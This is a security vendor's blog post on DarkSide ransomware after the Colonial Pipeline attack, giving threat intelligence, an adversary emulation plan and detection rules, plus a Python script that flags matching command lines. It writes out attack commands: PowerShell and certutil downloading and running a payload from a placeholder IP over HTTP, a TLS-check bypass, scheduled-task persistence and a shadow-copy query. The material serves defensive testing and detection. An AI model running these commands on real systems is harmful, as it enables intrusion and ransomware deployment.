#ThreatThursday - DarkSide Ransomware

Over Mother’s Day weekend, we heard of the latest ransomware attack, this time on Colonial Pipeline: the IT infrastructure of the pipeline that carries 2.5 million barrels a day, roughly 45% of the United States East Coast's supply of diesel, petrol and jet fuel, was affected. On Monday, May 10, the FBI confirmed that the attack on Colonial Pipeline used the ransomware known as DarkSide.

In this blog we consume Cyber Threat Intelligence to understand how the DarkSide ransomware behaves, we create and share an adversary emulation plan so you can quickly test, measure, and improve your people, process, and technology for similar attacks, and we discuss how to detect and respond to DarkSide ransomware.

Cyber Threat Intelligence

The DarkSide ransomware has been used for 9-10 months per Catalin Cimpanu, which gives us a good foundation of Cyber Threat Intelligence (CTI). This adversary emulation plan is based on Cybereason’s intel from April 2021. We see that DarkSide has evolved like Maze, Ryuk and Egregor to perform double extortion. Double extortion is when the threat group steals files from the victim and threatens to post them on its website in order to pressure the victim into paying, in addition to encrypting all the files and only offering to unlock them after payment is received.

According to DarkTracer: DarkWeb Criminal Intelligence, DarkSide has attacked 3 other Oil and Gas companies since November 2020.

From the CTI, there are a few things that stick out that we should test our organizations for:

  • Command and Control was observed as HTTP (clear text) instead of HTTPS
  • Downloading the malware was directly to a “naked IP” not a domain name as most people would use to navigate to a website
  • PowerShell.exe and Certutil for downloading and executing the ransomware
  • Scheduled Tasks
  • Checking the operating system language before performing ransomware TTPs

Adversary Emulation Plan

As usual, we have shared the adversary emulation plan with the community through our GitHub. There is a little bit of setup as this threat actor leverages poor operational security such as direct IP address access and HTTP.

HTTP for C2

Ensure you have the HTTP relay installed on your SCYTHE server or on a different host and redirecting to your SCYTHE server. Create a new SCYTHE campaign as you would normally do but select HTTP as the communication method. Ensure the parameters are correct for your relay configuration. The Cyber Threat Intelligence shows that “naked IPs” were used so you may want to set the parameters to an IP address instead of a domain name.

In the automation steps screen, import from existing threats: DarkSide. Here are a few steps from the plan we want to call out:

  • The DarkSide ransomware checks the operating system language before executing the ransomware. In Step 2 of the plan, we do the same checking for the English language: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language
  • Step 3 then decides whether to continue execution based on the language
  • Step 9 creates a new Scheduled Task named how the Cyber Threat Intelligence informed us: SCHTASKS /CREATE /SC DAILY /TN "MyTasks\Task1" /TR "C:\update.exe" /ST 11:00 /F
  • Step 17 performs data staging and step 18 does exfiltration through the C2 channel
  • Step 19 then encrypts the data and erases the original
  • Step 22 checks whether your payload is running with local administrator privileges and, if so, executes powershell Get-WmiObject Win32_Shadowcopy
  • Steps 25 and 26 clean up to leave the system how we found it.

Execution

According to the Cyber Threat Intelligence, the threat actor leveraged PowerShell.exe and CertUtil.exe to download and then execute the ransomware.

  • powershell -Command "(New-Object Net.WebClient).DownloadFile('http://NakedIP/payload.exe','C:\Users\Public\update.exe')"
  • Certutil.exe -urlcache -split -f http://NakedIP/payload.exe C:\Temp\update.exe

The SCYTHE server will always push you to HTTPS as a matter of operational security. However, we can still test by going to a direct IP address:

  • C:\Users\LocalUser>powershell
  • PS C:\Users\LocalUser> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  • PS C:\Users\LocalUser> (New-Object Net.WebClient).DownloadFile('http://NakedIP/ServiceLogin?active=u1X899QnyUKGQ_BK409U7A&b=true','C:\Users\Public\update.exe')
  • PS C:\Users\LocalUser>C:\Users\Public\update.exe

Detect and Respond to DarkSide Ransomware

In an attempt to not sound like a broken record, we will focus on what makes this ransomware different to detect and respond to. As usual, making daily backups and restoring from them will get you back up and running as quickly as possible when the inevitable happens. However, you can detect and respond much earlier by building detection for these TTPs:

  • Detect and alert when the registry key for the default language of the operating system is queried; this is an early indicator.
  • Detect and alert when powershell.exe or certutil.exe goes out to the Internet to retrieve any file.
  • Detect and alert on any outbound connections to a “naked IP” address. Humans generally do not type these out. I have seen companies completely prevent this access with their web proxies.
  • Alert when a new scheduled task is created.
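As an added example (not part of the original post or the SCYTHE emulation plan), the following Python triages constructed process-creation events against the four TTPs above plus the shadow-copy access from Step 22, so a blue team can see which command lines from the plan each rule fires on. The 203.0.113.7 address and the updates.example.com host are constructed sample values, not indicators from the CTI.

```python
import re

# Constructed sample process-creation events (image, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("reg.exe", r"reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language"),
    ("powershell.exe", r'''powershell -Command "(New-Object Net.WebClient).DownloadFile('http://203.0.113.7/payload.exe','C:\Users\Public\update.exe')"'''),
    ("certutil.exe", r"Certutil.exe -urlcache -split -f http://203.0.113.7/payload.exe C:\Temp\update.exe"),
    ("schtasks.exe", r'SCHTASKS /CREATE /SC DAILY /TN "MyTasks\Task1" /TR "C:\update.exe" /ST 11:00 /F'),
    ("powershell.exe", "powershell Get-WmiObject Win32_Shadowcopy"),
    ("powershell.exe", r'powershell -Command "Invoke-WebRequest https://updates.example.com/agent.msi -OutFile C:\Temp\agent.msi"'),
    ("notepad.exe", r"notepad.exe C:\Users\Public\notes.txt"),  # benign control, should produce no hits
]

URL_RE = re.compile(r"(https?)://([^/\s:'\"]+)", re.IGNORECASE)   # (scheme, host) of any URL in the command line
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")                  # host written as a bare IPv4 address
LANG_KEY = r"\control\nls\language"   # tail of the key DarkSide queries (Step 2 of the plan), lower-cased
DOWNLOADERS = {"powershell.exe", "certutil.exe"}   # the two LOLBins the CTI saw fetching the payload

def classify(image, cmdline):
    """Return the DarkSide TTP labels this one event matches (empty list if none)."""
    img, cmd, hits = image.lower(), cmdline.lower(), []
    if img == "reg.exe" and "query" in cmd and LANG_KEY in cmd:
        hits.append("os-language-check")
    if img in DOWNLOADERS:
        urls = URL_RE.findall(cmdline)
        if urls:
            hits.append("lolbin-download")
            if any(scheme.lower() == "http" for scheme, _ in urls):
                hits.append("cleartext-http")          # C2/download over HTTP instead of HTTPS
            if any(IPV4_RE.match(host) for _, host in urls):
                hits.append("naked-ip")                # no domain name, just an IP address
    if img == "schtasks.exe" and "/create" in cmd:
        hits.append("scheduled-task-created")
    if "win32_shadowcopy" in cmd:
        hits.append("shadow-copy-access")              # precursor to shadow-copy deletion (Step 22)
    return hits

def triage(events):
    """Map each suspicious command line to its labels; events with no hits are dropped."""
    return {cmd: classify(img, cmd) for img, cmd in events if classify(img, cmd)}

if __name__ == "__main__":
    for cmd, labels in triage(SAMPLE_EVENTS).items():
        print(", ".join(labels).ljust(55), cmd)
```

Running the script prints six flagged command lines and silently drops the notepad.exe control; the https download is still reported as a LOLBin download but carries neither the cleartext-http nor the naked-ip label.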

Conclusion

We can no longer dismiss ransomware as an annoying attack that affects everyone but us. No company is immune to these attacks and therefore every company needs to be prepared. In this post we leveraged Cyber Threat Intelligence from Cybereason to understand how this adversary behaves, we created and shared an adversary emulation plan so you can quickly test, measure, and improve your people, process, and technology against similar attacks, and we discussed how to detect and respond to DarkSide ransomware.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, or follow on Twitter @scythe_io.